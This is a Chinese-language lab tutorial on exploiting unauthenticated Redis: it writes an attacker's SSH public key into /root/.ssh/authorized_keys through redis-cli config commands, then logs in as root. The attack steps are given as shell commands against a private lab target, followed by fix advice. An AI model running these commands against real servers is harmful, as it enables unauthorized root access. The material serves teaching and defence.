文章目录

  • 漏洞描述(介绍、成因)
  • 漏洞危害
  • 适用场景
  • 实验环境
  • 漏洞复现过程(有条件的自行搭建环境)
  • redis未授权利用公钥登录ssh
  • 1、在kali生成一对ssh密钥
  • 2、查看生成的公钥key
  • 3、导出key
  • 4、把公钥key写入redis的键值key中
  • 5、设置保存的文件路径
  • 6、设置保存的文件名authorized_keys
  • 7、通过ssh公钥认证登录目标机器
  • 修复建议
  • 扩展知识(链接、文章)


漏洞描述(介绍、成因)

Redis 默认情况下,会绑定在 0.0.0.0:6379,,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。

漏洞危害

1、攻击者无需认证访问到内部数据,可能导致敏感信息泄露,黑客也可以恶意执行flushall来清空所有数据;

2、攻击者可通过EVAL执行lua代码,或通过数据备份功能往磁盘写入后门文件;

3、最严重的情况,如果Redis以root身份运行,黑客可以给root账户写入SSH公钥文件,直接通过SSH登录受害服务器。

适用场景

目标机器存在redis未授权漏洞,或者redis弱口令漏洞。

实验环境

个人虚拟机

  • 攻击机:
  • Kali 192.168.10.128
  • 靶机:
  • Centos7(开启 redis 服务器) 192.168.10.135

漏洞复现过程(有条件的自行搭建环境)

redis未授权利用公钥登录ssh

1、在kali生成一对ssh密钥

ssh-keygen -t rsa

redis弱口令漏洞检验工具 redis弱口令怎么解决_渗透测试

2、查看生成的公钥key

cd /root/.ssh/
cat ./id_rsa.pub

redis弱口令漏洞检验工具 redis弱口令怎么解决_渗透测试_02

3、导出key

(echo -e "\n\n";cat id_rsa.pub;echo -e "\n\n") > key.txt

redis弱口令漏洞检验工具 redis弱口令怎么解决_redis弱口令漏洞检验工具_03

4、把公钥key写入redis的键值key中

cat key.txt|redis-cli -h 192.168.10.135 -x set key

redis弱口令漏洞检验工具 redis弱口令怎么解决_渗透测试_04

5、设置保存的文件路径

config  set  dir /root/.ssh

redis弱口令漏洞检验工具 redis弱口令怎么解决_redis_05

6、设置保存的文件名authorized_keys

redis-cli -h 192.168.10.135 config set dbfilename authorized_keys

redis弱口令漏洞检验工具 redis弱口令怎么解决_渗透测试_06

7、通过ssh公钥认证登录目标机器

ssh -i id_rsa root@192.168.10.135

redis弱口令漏洞检验工具 redis弱口令怎么解决_1024程序员节_07

修复建议

1、禁止外部访问Redis服务端口;

2、禁止使用root权限启动redis服务;

3、配置安全组,限制可连接Redis服务器的IP。

扩展知识(链接、文章)

其他利用手法:Redis未授权最全利用方式

注:本文章仅作技术学习作用,一切实验皆在个人虚拟环境下进行!!!